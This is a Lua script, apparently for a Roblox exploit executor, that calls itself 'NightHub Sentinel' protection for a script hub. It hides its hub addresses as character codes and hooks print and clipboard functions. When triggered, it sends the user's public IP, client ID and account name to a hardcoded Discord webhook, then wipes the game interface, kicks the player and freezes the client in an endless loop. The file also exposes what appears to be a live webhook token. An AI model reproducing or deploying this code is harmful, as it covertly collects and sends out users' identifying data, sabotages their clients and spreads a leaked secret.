
--[[ 
    NIGHTHUB SENTINEL V4 - LIGHTWEIGHT PROTECTION
    Optimized for: Performance & Stealth
]]

local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")
local RunService = game:GetService("RunService")
local CoreGui = game:GetService("CoreGui")
local player = Players.LocalPlayer

-- ==========================================
-- 1. CẤU HÌNH BẢO MẬT (ENCRYPTED)
-- ==========================================
local function d(t) local s = "" for i = 1, #t do s = s .. string.char(t[i]) end return s end

local URL_KEY_1 = d({110,105,103,104,116,104,117,98,46,115,105,116,101}) -- nighthub.site
local URL_KEY_2 = d({49,54,48,46,49,56,55,46,50,52,54,46,56,58,49,50,48,57}) -- 160.187.246.8:1209
local WEBHOOK = "https://discord.com/api/webhooks/1474769654378528890/KaL0m6edEpRSD2YQp4kaKjPV0MGfgE4QfHa7MXH4cG3lgtej8Sm6EEY1_Jhy-QtK_Bj3"
local DATA_FILE = "nighthub_v4_lite.json"

-- ==========================================
-- 2. QUẢN LÝ DATA (STRIKES & BAN)
-- ==========================================
local function getLog()
    if isfile and isfile(DATA_FILE) then
        local s, r = pcall(function() return HttpService:JSONDecode(readfile(DATA_FILE)) end)
        if s then return r end
    end
    return {s = 0, t = 0, b = 0}
end

local function saveLog(t) if writefile then writefile(DATA_FILE, HttpService:JSONEncode(t)) end end

-- ==========================================
-- 3. HÀM TRỪNG PHẠT (NUKE & CRASH)
-- ==========================================
local function ExecuteNuke(reason)
    local log = getLog()
    local now = os.time()
    
    log.s = log.s + 1
    log.t = now
    
    local banned = false
    if log.s >= 4 then
        log.b = now + 86400 -- Ban 24h
        banned = true
    end
    saveLog(log)

    -- Gửi Webhook báo cáo (IP & HWID)
    task.spawn(function()
        local ip = "N/A"
        pcall(function() ip = game:HttpGet("https://api.ipify.org") end)
        local hwid = game:GetService("RbxAnalyticsService"):GetClientId()
        
        if request then
            request({
                Url = WEBHOOK,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode({
                    ["embeds"] = {{
                        ["title"] = banned and "🚫 BAN IP KÍCH HOẠT" or "⚠️ PHÁT HIỆN SPY",
                        ["color"] = banned and 16711680 or 16753920,
                        ["fields"] = {
                            {["name"] = "Tài khoản", ["value"] = player.Name, ["inline"] = true},
                            {["name"] = "IP/HWID", ["value"] = ip .. "\n" .. hwid, ["inline"] = true},
                            {["name"] = "Lý do", ["value"] = reason, ["inline"] = false}
                        }
                    }}
                })
            })
        end
    end)

    -- Hiệu ứng trừng phạt (Xóa UI & Crash)
    pcall(function()
        if gethui then gethui():ClearAllChildren() end
        if CoreGui then CoreGui:ClearAllChildren() end
        player.PlayerGui:ClearAllChildren()
        
        local sg = Instance.new("ScreenGui", CoreGui or player.PlayerGui)
        local f = Instance.new("Frame", sg)
        f.Size = UDim2.new(10, 0, 10, 0)
        f.BackgroundColor3 = Color3.new(0,0,0)
        f.ZIndex = 9999999
        
        -- Spam Console
        RunService.RenderStepped:Connect(function()
            print("🛡️ NIGHTHUB: DATA PROTECTED!")
            if rconsoleprint then rconsoleprint("!!! SECURITY ALERT !!!\n") end
        end)
    end)

    task.wait(0.5)
    player:Kick("\n🛡️ NIGHTHUB SECURITY 🛡️\n\nPhát hiện Spy API!\nTrạng thái: " .. (banned and "BANNED 24H" or "KICKED"))
    while true do end
end

-- ==========================================
-- 4. HÀM KIỂM TRA CHUỖI (OPTIMIZED)
-- ==========================================
local function isSecret(t)
    local s = tostring(t):lower()
    if #s > 10 and #s < 1000 then -- Chỉ kiểm tra chuỗi có độ dài hợp lý để tránh lag
        return s:find(URL_KEY_1) or s:find(URL_KEY_2)
    end
    return false
end

-- ==========================================
-- 5. THEO DÕI SỰ KIỆN (EVENT-BASED)
-- ==========================================
-- Quét UI mới (Cực nhẹ so với dùng vòng lặp)
local function onChildAdded(obj)
    local n = obj.Name:lower()
    if n:find("spy") or n:find("hydroxide") or n:find("http") then
        ExecuteNuke("Spy UI Detected: " .. obj.Name)
    end
end

CoreGui.ChildAdded:Connect(onChildAdded)
if gethui then gethui().ChildAdded:Connect(onChildAdded) end

-- Hooking (Chặn Print & Clipboard)
if hookfunction then
    local op; op = hookfunction(print, function(...)
        local a = {...}
        if isSecret(a[1]) then ExecuteNuke("Print URL") end
        return op(...)
    end)

    local osb; osb = hookfunction(setclipboard or toclipboard, function(t)
        if isSecret(t) then ExecuteNuke("Clipboard Copy") end
        return osb(t)
    end)
end

-- ==========================================
-- 6. KIỂM TRA TRẠNG THÁI KHI VÀO GAME
-- ==========================================
local sd = getLog()
local now = os.time()

if sd.b > now then
    player:Kick("🚫 Bạn đang bị Ban 24h. Vui lòng quay lại sau.")
    return
elseif sd.b > 0 and now >= sd.b then
    sd.s = 0; sd.b = 0; saveLog(sd)
elseif sd.s > 0 and (now - sd.t >= 86400) then
    sd.s = 0; saveLog(sd)
end

-- Watchdog chạy rất chậm (15s/lần) để đảm bảo không lag
task.spawn(function()
    while task.wait(15) do
        if not iscclosure(print) or not iscclosure(setclipboard) then
            ExecuteNuke("System Hook Tampering")
        end
    end
end)

print("🛡️ NightHub Sentinel V4 (Lite) Loaded.")
